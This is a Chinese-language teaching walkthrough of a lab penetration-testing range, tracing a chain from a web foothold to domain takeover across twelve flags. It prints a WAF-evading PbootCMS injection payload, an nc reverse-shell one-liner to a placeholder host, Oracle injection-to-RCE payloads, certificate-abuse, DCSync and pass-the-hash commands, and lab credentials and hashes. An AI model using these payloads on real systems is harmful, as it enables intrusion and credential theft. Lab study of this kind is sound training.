春秋云境-无间计划渗透测试教学文档

1. 目标概述

本次渗透测试涉及多个IP地址和flag，主要目标包括：

• 172.23.4.32 (flag1)
• 172.23.4.51 (flag2)
• 172.23.4.12 (flag3)
• 172.23.4.19 (flag4)
• 172.24.7.3 (flag5)
• 172.24.7.5 (flag6)
• 172.24.7.48 (flag7)
• 172.24.7.43 (flag8)
• 172.25.12.29 (flag9)
• 172.25.12.19 (flag10)
• 172.25.12.19 (flag11)
• 172.26.8.16 (flag12)

2. 渗透测试详细步骤

2.1 flag1 (172.23.4.32)

攻击路径：

1. 发现目标运行PbootCMS系统
2. 利用模板注入漏洞进行命令执行
3. 使用hex编码绕过WAF检测

利用方法：

GET /?a=}{pboot{user:password}:if(("sy\x73\x74em")("whoami"));//)}xxx{/pboot{user:password}:if} HTTP/1.1
Host: 39.101.141.214

反弹shell命令：

?a=}{pboot{user:password}:if(("sys\x74em")("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc xxx.xxx.xxx.xxx 9383 >/tmp/f"));//)}xxx{/pboot{user:password}:if}

提权方法：

• 使用CVE-2022-2588提权
• 直接运行提权脚本获得root权限
• 通过su user获取flag

2.2 flag2 (172.23.4.51)

攻击路径：

1. 发现Oracle数据库注入点
2. 通过Oracle注入实现RCE

利用步骤：

1. 创建JAVA Source：

admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object { public static String runCMD(String args) { try { BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream())); String stemp,str=""; while ((stemp = myReader.readLine()) != null) str += stemp+"\n"; myReader.close(); return str; } catch (Exception e){ return e.toString(); }}}''; commit; end;') from dual)>1 --

2. 创建函数：

admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate ''create or replace function LINXRUNCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String'''';''; commit; end;') from dual)>1--

3. 命令执行：

admin' union select null,(select LINXRUNCMD('whoami') from dual),null from dual--

2.3 flag3 (172.23.4.12)

攻击路径：

1. 从Oracle机器获取凭证：usera@pentest.me / Admin3gv83
2. 使用crackmapexec爆破C段：

proxychains4 crackmapexec smb 172.23.4.0/24 -u usera -p Admin3gv83 -d pentest.me

3. 通过RDP登录获取flag

2.4 flag4 (172.23.4.19)

攻击路径：

1. 在172.23.4.12的hosts文件中发现连接记录
2. 使用私钥连接：

proxychains4 ssh -i id_rsa 172.23.4.19

3. flag位于根目录

2.5 flag5 (172.24.7.3)

攻击路径：

1. 发现CA服务器漏洞
2. 利用CA漏洞进行域控提权

详细步骤：

1. 申请证书：

proxychains4 certipy req -u 'usera@pentest.me' -p 'Admin3gv83' -target 172.24.7.3 -dc-ip 172.24.7.3 -ca 'pentest-DC-CA' -template 'User'

2. 验证证书：

proxychains4 certipy auth -pfx usera.pfx -dc-ip 172.24.7.3

3. 创建机器账户：

python bloodyAD.py -d pentest.me -u usera -p Admin3gv83 --host 172.24.7.3 addComputer "Chu0" "whoami@666"

4. 设置机器账户属性：

python bloodyAD.py -d pentest.me -u usera -p Admin3gv83 --host 172.24.7.3 setAttribute "CN=Chu0,CN=Computers,DC=pentest,DC=me" dNSHostName "[\"DC.pentest.me\"]"

5. 再次申请证书：

proxychains4 certipy req -u 'Chu0$@pentest.me' -p 'whoami@666' -template Machine -dc-ip 172.24.7.3 -ca 'pentest-DC-CA'

6. Dump哈希：

proxychains4 impacket-secretsdump 'dc$@pentest.me@DC.pentest.me' -hashes :f3cd1975ace5ef84a34bbc8bb25ad048

7. 横向移动：

proxychains4 impacket-smbexec -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.3

2.6 flag6 (172.24.7.5)

攻击路径：

1. 使用之前获取的哈希横向移动：

proxychains4 impacket-smbexec -hashes :0f91138ef5392b87416ed41cb6e810b7 pen.me/administrator@172.25.12.29

2.7 flag7 (172.24.7.48)

攻击路径：

1. 使用相同方法横向移动获取flag

2.8 flag8 (172.24.7.43)

攻击路径：

1. 使用Pysql提权：

enable_ole
enable_clr
install_clr
clr_badpotato
type C:\Users\Administrator\Desktop\flag.txt

2.9 flag9 (172.25.12.29)

攻击路径：

1. 发现新域pen.me
2. 使用DCSync获取哈希：

mimikatz.exe "lsadump::dcsync /domain:pen.me /all /csv" exit

2.10 flag10 (172.25.12.19)

攻击路径：

1. 横向移动：

proxychains4 impacket-smbexec -hashes :0f91138ef5392b87416ed41cb6e810b7 pen.me/administrator@172.25.12.19

2.11 flag11 (172.25.12.19)

攻击路径：

1. 创建用户RDP登录
2. 从邮件中获取flag

2.12 flag12 (172.26.8.16)

攻击路径：

1. 使用凭证：usera/Admin3gv83
2. 获取GitLab token：

echo 'grant_type=password&username=usera&password=Admin3gv83' > auth.txt

3. 查看GitLab用户：

proxychains4 -q curl --header "Authorization: Bearer 1256b54bb609ded0f5290321e1ccd31861f9e6606cc62af650ffcc264df35ccf" http://172.24.7.23/api/v4/users

4. 发现luzizhuo用户的项目，获取配置信息

3. 关键工具和技术总结

1. 模板注入漏洞利用：PbootCMS模板注入实现RCE
2. Oracle注入RCE：通过Java Source创建实现命令执行
3. 横向移动技术：
   • CrackMapExec
   • Impacket工具套件(smbexec, secretsdump)
   • Certipy证书攻击
   • BloodyAD工具
4. 提权技术：
   • CVE-2022-2588
   • Pysql提权
   • CLR提权
5. 域渗透技术：
   • DCSync攻击
   • 证书滥用攻击
   • 机器账户滥用
6. 信息收集：
   • 内网扫描
   • GitLab API利用
   • 配置文件分析

4. 防御建议

1. 及时更新CMS系统和插件
2. 限制数据库用户权限，禁用危险函数
3. 实施网络分段，限制横向移动
4. 监控证书颁发和异常机器账户创建
5. 加强GitLab等开发工具的访问控制
6. 禁用不必要的CLR和OLE功能
7. 实施严格的防火墙规则和日志监控

5. 总结

本次渗透测试展示了从Web应用漏洞到内网域控的完整攻击链，涉及多种高级攻击技术。攻击者通过模板注入获得初始立足点，利用Oracle注入扩大控制范围，最终通过证书攻击和DCSync技术完全控制域环境。防御方需要采取纵深防御策略，从多个层面阻断攻击路径。